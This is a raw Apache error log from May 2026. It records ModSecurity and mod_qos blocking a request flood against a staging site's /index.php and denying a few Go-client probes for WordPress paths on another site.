[Tue May 26 20:00:45.443849 2026] [security2:error] [pid 106517:tid 106721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1m2wAAAMs"]
[Tue May 26 20:00:45.449992 2026] [security2:error] [pid 106517:tid 106773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1m2gAAAP8"]
[Tue May 26 20:00:45.450946 2026] [security2:error] [pid 106517:tid 106754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1m9wAAAOw"]
[Tue May 26 20:00:45.450960 2026] [security2:error] [pid 112029:tid 112216] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulKFW0C-ajaCsyFc6_wAAAUM"]
[Tue May 26 20:00:45.690150 2026] [security2:error] [pid 106517:tid 106715] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWulYZZc2DoU1lPnP1nZgAAAMU"]
[Tue May 26 20:00:45.866831 2026] [security2:error] [pid 112029:tid 112169] [client 103.163.220.46:46781] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/css/colors/modern/"] [unique_id "ahWulaFW0C-ajaCsyFc7RgAAARQ"]
[Tue May 26 20:00:45.941665 2026] [qos:error] [pid 112029:tid 112174] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWulaFW0C-ajaCsyFc7WwAAARk
[Tue May 26 20:00:45.941927 2026] [qos:error] [pid 106517:tid 106668] [client 45.148.10.120:46444] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nvQAAAJc
[Tue May 26 20:00:45.944193 2026] [qos:error] [pid 112029:tid 112252] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWulaFW0C-ajaCsyFc7YAAAAWc
[Tue May 26 20:00:45.947714 2026] [qos:error] [pid 106517:tid 106778] [client 45.148.10.120:46340] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nwAAAAQQ
[Tue May 26 20:00:45.948108 2026] [qos:error] [pid 112029:tid 112243] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWulaFW0C-ajaCsyFc7YgAAAV4
[Tue May 26 20:00:45.948140 2026] [qos:error] [pid 106517:tid 106772] [client 45.148.10.120:46448] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWulYZZc2DoU1lPnP1nwQAAAP4
[Tue May 26 20:00:45.948261 2026] [qos:error] [pid 112029:tid 112217] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWulaFW0C-ajaCsyFc7YwAAAUQ
[Tue May 26 20:00:45.953547 2026] [qos:error] [pid 112029:tid 112188] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWulaFW0C-ajaCsyFc7ZwAAASc
[Tue May 26 20:00:45.954046 2026] [qos:error] [pid 112029:tid 112271] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWulaFW0C-ajaCsyFc7aAAAAXo
[Tue May 26 20:00:45.954182 2026] [qos:error] [pid 112029:tid 112211] [client 45.148.10.120:46530] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWulaFW0C-ajaCsyFc7aQAAAT4
[Tue May 26 20:00:46.276233 2026] [security2:error] [pid 106517:tid 106657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1nAQAAAIw"]
[Tue May 26 20:00:46.276836 2026] [security2:error] [pid 106517:tid 106701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1nBgAAALc"]
[Tue May 26 20:00:46.276889 2026] [security2:error] [pid 106517:tid 106734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1nAgAAANg"]
[Tue May 26 20:00:46.286068 2026] [security2:error] [pid 106517:tid 106695] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1m_wAAALE"]
[Tue May 26 20:00:46.287346 2026] [security2:error] [pid 106517:tid 106746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1nBAAAAOQ"]
[Tue May 26 20:00:46.287416 2026] [security2:error] [pid 106517:tid 106671] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1m-wAAAJo"]
[Tue May 26 20:00:46.305825 2026] [security2:error] [pid 106517:tid 106759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1nBQAAAPE"]
[Tue May 26 20:00:46.309796 2026] [security2:error] [pid 106517:tid 106661] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1nAAAAAJA"]
[Tue May 26 20:00:46.311687 2026] [security2:error] [pid 106517:tid 106740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1nDgAAAN4"]
[Tue May 26 20:00:46.316404 2026] [security2:error] [pid 112029:tid 112268] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulKFW0C-ajaCsyFc7CQAAAXc"]
[Tue May 26 20:00:46.323959 2026] [security2:error] [pid 106517:tid 106679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1nEAAAAKE"]
[Tue May 26 20:00:46.335974 2026] [security2:error] [pid 106517:tid 106733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1nDQAAANc"]
[Tue May 26 20:00:46.345522 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulYZZc2DoU1lPnP1nhgAAALM"]
[Tue May 26 20:00:46.355893 2026] [security2:error] [pid 112029:tid 112230] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulKFW0C-ajaCsyFc7EgAAAVE"]
[Tue May 26 20:00:46.356140 2026] [security2:error] [pid 112029:tid 112209] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulKFW0C-ajaCsyFc7EwAAATw"]
[Tue May 26 20:00:46.361418 2026] [security2:error] [pid 112029:tid 112270] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulKFW0C-ajaCsyFc7EQAAAXk"]
[Tue May 26 20:00:46.363587 2026] [security2:error] [pid 106517:tid 106666] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1nEQAAAJU"]
[Tue May 26 20:00:46.364376 2026] [security2:error] [pid 106517:tid 106667] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulYZZc2DoU1lPnP1nkgAAAJY"]
[Tue May 26 20:00:46.369621 2026] [security2:error] [pid 112029:tid 112247] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulaFW0C-ajaCsyFc7OQAAAWI"]
[Tue May 26 20:00:46.370849 2026] [security2:error] [pid 112029:tid 112218] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulKFW0C-ajaCsyFc7FgAAAUU"]
[Tue May 26 20:00:46.371224 2026] [security2:error] [pid 106517:tid 106724] [client 103.163.220.18:49539] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/about.php"] [unique_id "ahWuloZZc2DoU1lPnP1nyQAAAM4"]
[Tue May 26 20:00:46.372406 2026] [security2:error] [pid 106517:tid 106680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1nIAAAAKI"]
[Tue May 26 20:00:46.378080 2026] [security2:error] [pid 112029:tid 112269] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulaFW0C-ajaCsyFc7PAAAAXg"]
[Tue May 26 20:00:46.385540 2026] [security2:error] [pid 106517:tid 106659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1nDwAAAI4"]
[Tue May 26 20:00:46.394615 2026] [security2:error] [pid 112029:tid 112190] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulaFW0C-ajaCsyFc7PQAAASk"]
[Tue May 26 20:00:46.397001 2026] [security2:error] [pid 112029:tid 112171] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulaFW0C-ajaCsyFc7OAAAARY"]
[Tue May 26 20:00:46.398204 2026] [security2:error] [pid 106517:tid 106689] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulIZZc2DoU1lPnP1m_gAAAKs"]
[Tue May 26 20:00:46.400139 2026] [security2:error] [pid 106517:tid 106756] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulYZZc2DoU1lPnP1nlwAAAO4"]
[Tue May 26 20:00:46.409879 2026] [security2:error] [pid 112029:tid 112207] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulaFW0C-ajaCsyFc7QQAAATo"]
[Tue May 26 20:00:46.429617 2026] [security2:error] [pid 106517:tid 106769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulYZZc2DoU1lPnP1nqAAAAPs"]
[Tue May 26 20:00:46.431452 2026] [security2:error] [pid 112029:tid 112184] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulaFW0C-ajaCsyFc7PgAAASM"]
[Tue May 26 20:00:46.435227 2026] [security2:error] [pid 112029:tid 112187] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulaFW0C-ajaCsyFc7PwAAASY"]
[Tue May 26 20:00:46.438276 2026] [security2:error] [pid 106517:tid 106662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulYZZc2DoU1lPnP1nmQAAAJE"]
[Tue May 26 20:00:46.440779 2026] [security2:error] [pid 106517:tid 106758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulYZZc2DoU1lPnP1npwAAAPA"]
[Tue May 26 20:00:46.823487 2026] [qos:error] [pid 112029:tid 112193] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWulqFW0C-ajaCsyFc7ngAAASw
[Tue May 26 20:00:46.825104 2026] [qos:error] [pid 112029:tid 112270] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWulqFW0C-ajaCsyFc7pQAAAXk
[Tue May 26 20:00:46.825095 2026] [qos:error] [pid 112029:tid 112258] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWulqFW0C-ajaCsyFc7nwAAAW0
[Tue May 26 20:00:46.826419 2026] [qos:error] [pid 112029:tid 112278] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWulqFW0C-ajaCsyFc7pgAAAYE
[Tue May 26 20:00:46.831268 2026] [qos:error] [pid 112029:tid 112221] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWulqFW0C-ajaCsyFc7rAAAAUg
[Tue May 26 20:00:46.831491 2026] [qos:error] [pid 112029:tid 112265] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWulqFW0C-ajaCsyFc7rQAAAXQ
[Tue May 26 20:00:46.831518 2026] [qos:error] [pid 112029:tid 112194] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWulqFW0C-ajaCsyFc7qwAAAS0
[Tue May 26 20:00:46.833661 2026] [qos:error] [pid 112029:tid 112226] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWulqFW0C-ajaCsyFc7sgAAAU0
[Tue May 26 20:00:46.833704 2026] [qos:error] [pid 112029:tid 112258] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWulqFW0C-ajaCsyFc7sAAAAW0
[Tue May 26 20:00:46.874757 2026] [security2:error] [pid 106517:tid 106674] [client 103.163.220.32:27317] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/options.php"] [unique_id "ahWuloZZc2DoU1lPnP1oMAAAAJ0"]
[Tue May 26 20:00:46.972897 2026] [qos:error] [pid 106517:tid 106723] [client 45.148.10.120:46350] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuloZZc2DoU1lPnP1oMgAAAM0
[Tue May 26 20:00:46.978361 2026] [qos:error] [pid 106517:tid 106711] [client 45.148.10.120:46456] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuloZZc2DoU1lPnP1oMwAAAME
[Tue May 26 20:00:46.979307 2026] [qos:error] [pid 106517:tid 106756] [client 45.148.10.120:46470] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuloZZc2DoU1lPnP1oNAAAAO4
[Tue May 26 20:00:46.981514 2026] [qos:error] [pid 106517:tid 106722] [client 45.148.10.120:46454] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuloZZc2DoU1lPnP1oNgAAAMw
[Tue May 26 20:00:46.981540 2026] [qos:error] [pid 106517:tid 106697] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuloZZc2DoU1lPnP1oNQAAALM
[Tue May 26 20:00:46.982364 2026] [qos:error] [pid 106517:tid 106778] [client 45.148.10.120:46480] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuloZZc2DoU1lPnP1oNwAAAQQ
[Tue May 26 20:00:46.983666 2026] [qos:error] [pid 106517:tid 106752] [client 45.148.10.120:46412] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuloZZc2DoU1lPnP1oOAAAAOo
[Tue May 26 20:00:46.987206 2026] [qos:error] [pid 106517:tid 106714] [client 45.148.10.120:57942] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuloZZc2DoU1lPnP1oOQAAAMQ
[Tue May 26 20:00:46.988418 2026] [qos:error] [pid 106517:tid 106725] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuloZZc2DoU1lPnP1oOgAAAM8
[Tue May 26 20:00:47.277967 2026] [security2:error] [pid 106517:tid 106660] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulYZZc2DoU1lPnP1njgAAAI8"]
[Tue May 26 20:00:47.279619 2026] [security2:error] [pid 112029:tid 112250] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulaFW0C-ajaCsyFc7QAAAAWU"]
[Tue May 26 20:00:47.284030 2026] [security2:error] [pid 106517:tid 106730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulYZZc2DoU1lPnP1nlQAAANQ"]
[Tue May 26 20:00:47.289655 2026] [security2:error] [pid 112029:tid 112283] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulaFW0C-ajaCsyFc7SAAAAYY"]
[Tue May 26 20:00:47.295810 2026] [security2:error] [pid 106517:tid 106753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulYZZc2DoU1lPnP1nsQAAAOs"]
[Tue May 26 20:00:47.295851 2026] [security2:error] [pid 106517:tid 106670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulYZZc2DoU1lPnP1nrwAAAJk"]
[Tue May 26 20:00:47.297844 2026] [security2:error] [pid 106517:tid 106709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulYZZc2DoU1lPnP1nlgAAAL8"]
[Tue May 26 20:00:47.310382 2026] [security2:error] [pid 112029:tid 112199] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulaFW0C-ajaCsyFc7VAAAATI"]
[Tue May 26 20:00:47.311395 2026] [security2:error] [pid 112029:tid 112192] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulaFW0C-ajaCsyFc7UwAAASs"]
[Tue May 26 20:00:47.328110 2026] [security2:error] [pid 112029:tid 112175] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulaFW0C-ajaCsyFc7VQAAARo"]
[Tue May 26 20:00:47.335714 2026] [security2:error] [pid 112029:tid 112185] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulaFW0C-ajaCsyFc7ZQAAASQ"]
[Tue May 26 20:00:47.342697 2026] [security2:error] [pid 106517:tid 106652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulYZZc2DoU1lPnP1ntQAAAIc"]
[Tue May 26 20:00:47.344710 2026] [security2:error] [pid 112029:tid 112197] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWulaFW0C-ajaCsyFc7UgAAATA"]
